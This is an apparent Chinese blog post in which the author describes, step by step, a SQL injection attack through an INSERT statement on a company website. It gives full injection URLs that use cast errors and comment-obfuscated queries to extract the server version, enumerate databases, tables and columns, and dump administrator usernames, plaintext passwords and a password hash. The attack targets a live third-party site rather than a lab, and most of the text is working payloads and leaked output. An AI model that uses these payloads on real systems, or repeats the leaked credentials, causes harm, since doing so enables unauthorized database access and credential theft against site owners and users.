是insert類型的語句,百度了一下,對insert語句的注射大體有個瞭解,因而開始刺探信息。
提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,cast(@@version/**/as/**/int),null);–
不兼容…把int換成varchar,頁面返回正常。。。百度一下,原來是mssql不容許將text或ntext型數據直接轉換爲int型
要想爆出信息看來得找個varchar 或nvarchar類型的字段,把後面2個對換了一下位置,成功爆出。
提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,cast(system_user/**/as/**/int));–
在將 nvarchar 值 ‘AFDataLogin’ 轉換成數據類型 int 時失敗。
很好,再接着爆信息,收集的一些以下。
version:Microsoft SQL Server 2005 – 9.00.4035.00 (Intel X86)……Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
servername:SQL2005
host_name:IBM1
db_name:kunlun
user_name:dbo
能夠看出 web與數據庫分離,看來想差別備份或log備份是不行的了,只能爆後臺賬號、密碼進後臺了。
先爆一下庫,構造
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)–
修改第最後一個dbid的值,爆出13個庫…
1:master
2:tempdb
3:model
4:msdb
5:kunlun_BBS
6:kunlun
7:New_AF
8:AF_Back
9:Console
10:Newkunlun
11:Newkunlun2
12:Oldkunlun
13:NewBBS
接下來爆表名
構造: http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=’u'/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=’u'))–
修改第二個top的值,從0遞增上去。爆第六張表時很開心,立刻去爆字段、密碼。
1:AF_UserAccount
2:YX_Unit
3:AF_UnionCompany
4:YX_FlashXZ
5:AF_UserPointLogs
6:Buy_Admin
爆指定表Buy_Admin的字段
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)))–
爆出來了,同樣是修改第二個top的值。
密碼:af_APass
ID:af_ID
用戶:af_AName
看到name和pass很開心啊,立刻爆內容。
提交:
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)–
爆出來了,仍是明文的,呵呵,找後臺登陸。
hjbadmin hjbmanager
yck’ yck
高興早了,怎麼也登陸不了。唉,再爆表把,爆到第N張,看見YX_Manage,開心了,這回沒錯了,爆字段爆內容
YX_AdminUser YX_Pwd
hgnadmin 50252EC697150CC9AA69A47333C716B8
惋惜啊,md5解密不出….到這裏差很少就結束了。很晚了。
哦,忘了說了,這個是dbo權限,呵呵。
本文來源於獨自等待博客:http://www.waitalone.cn/ 原文地址:http://www.waitalone.cn/post/insertinjection.html